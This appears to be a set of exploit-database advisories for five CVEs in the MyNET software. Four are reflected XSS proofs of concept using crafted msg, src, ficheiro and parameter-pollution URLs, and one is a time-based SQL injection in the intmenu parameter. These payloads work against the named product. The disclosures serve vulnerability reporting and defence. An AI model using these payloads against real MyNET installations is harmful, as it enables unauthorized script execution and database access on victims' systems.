# Exploit Title: MyNET <= 26.05 - Reflected Cross Site Script via msg parameter # Date: 22/12/2025 # Exploit Author: Miguel Santareno and André Monteiro # Vendor Homepage: https://www.airc.pt/ # Software Link: https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN # Version: <= V.2022.837.002a # Tested on: Google and Firefox latest version # CVE : CVE-2024-25814 # 1. Description Unauthenticated users can Inject HTML and scripts into msg parameter on MyNET <= 26.05 since msg parameter is unsanitized. # 2. Proof of Concept (PoC) To sucefully exploit this attack and attacker need to send the following link to the victim with the payload https://example.com/?msg='-[location='Javascript:confirm`1`']-' <-------------------------------------------------------------------------------------------------------------> # Exploit Title: MyNET <= 26.05 - Reflected Cross Site Script via src parameter # Date: 22/12/2025 # Exploit Author: Miguel Santareno and André Monteiro # Vendor Homepage: https://www.airc.pt/ # Software Link: https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN # Version: <= V.2022.837.002a # Tested on: Google and Firefox latest version # CVE : CVE-2024-25812 # 1. Description Unauthenticated users can Inject HTML and scripts into src parameter on MyNET <= 26.05 since msg parameter is unsanitized. # 2. Proof of Concept (PoC) To sucefully exploit this attack and attacker need to send the following link to the victim with the payload https://example.com/?src="Style="position:fixed;top:0;left:0;font-size:999px;"OnPointerEnter="(confirm)(document.domain)" <----------------------------------------------------------------------------------------------------------------> # Exploit Title: MyNET <= 26.08 - Reflected Cross Site Script via ficheiro parameter # Date: 22/12/2025 # Exploit Author: Miguel Santareno # Vendor Homepage: https://www.airc.pt/ # Software Link: https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN # Version: <= V.2022.837.002a # Tested on: Google and Firefox latest version # CVE : CVE-2024-35322 # 1. Description Unauthenticated users can Inject HTML and scripts into ficheiro parameter on MyNET <= 26.08 since ficheiro parameter is unsanitized. # 2. Proof of Concept (PoC) To sucefully exploit this attack and attacker need to send the following link to the victim with the payload https://example.com/MyNetJSON.asp?acc=4&ficheiro=%3Cimg%20src=a%20onerror=alert(document.domain)%3E&formtoken=1234566&_tk= <----------------------------------------------------------------------------------------------------------------> # Exploit Title: MyNET <= 26.08 - Reflected Cross Site Script HTTP Paramater pollution # Date: 22/12/2025 # Exploit Author: Miguel Santareno # Vendor Homepage: https://www.airc.pt/ # Software Link: https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN # Version: <= V.2022.837.002a # Tested on: Google and Firefox latest version # CVE : CVE-2024-40317 # 1. Description Unauthenticated users can Inject HTML and scripts into parameters resulting on parameter pollution on MyNET <= 26.08 since parameters are unsanitized. # 2. Proof of Concept (PoC) To sucefully exploit this attack and attacker need to send the following link to the victim with the payload https://example.com/MyNetFormBD.asp?formato=int_registar&intmenu=1132&semuser=1&primeirachamada=1&le1wu'-alert(1)-'ivxas=1 <----------------------------------------------------------------------------------------------------------------> # Exploit Title: MyNET <= 26.08.316 - Unauthenticated SQL Injection # Date: 22/12/2025 # Exploit Author: Miguel Santareno # Vendor Homepage: https://www.airc.pt/ # Software Link: https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN # Version: <= V.2022.837.002a # Tested on: Google and Firefox latest version # CVE : CVE-2024-39037 # 1. Description Unauthenticated users can Inject SQL into intmenu parameter pollution on MyNET <= 26.08.316 since intmenu parameter is unsanitized. # 2. Proof of Concept (PoC) To sucefully exploit this attack and attacker need to send the following link to the victim with the payload https://example.com/MyNetFormBD.asp?formato=int_registar&intmenu=1132%3bSELECT+PG_SLEEP(10)--&semuser=1&primeirachamada=1